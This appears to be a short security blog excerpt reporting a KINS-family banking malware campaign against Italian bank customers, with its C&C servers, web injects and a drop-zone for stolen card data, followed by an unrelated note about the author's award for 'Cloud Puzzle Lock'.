Uncovering a C&C server used by hackers to control the infected victims. The malware analyses done on victim’s machines reveals that malware from KINS family is targeting specific Italian bank users with ATSEngine, with capability to dynamic inject a code in the victims browser and managing the “drops” in full automatic way. The attack campaign is ongoing right now and we recovered hacked accounts. Beside that we reveal the “drops” used to collect the stolen money from the customers.
Another compromised hostname “https://xxx.com” is acting like drop-zone for stolen data from eight different Italian banks. The analysis of this drop-zone reveal a custom web application focused for info stealing. They steal a credit card details from the infected users using a phishing attack.
The attack is alive and the amount of the targeted banks is very large, the C&C networked servers have more entry points making them redundant against the takedowns. The analaysed sample has more than 1450 bank hostname’s.
I am pleased to inform that my idea about Cloud Puzzle Lock win the Reply Innovation Awards 2014.
I like to thanks to all voters and supporters.
Special thanks to my team members Davide, Nicola and Alessandra.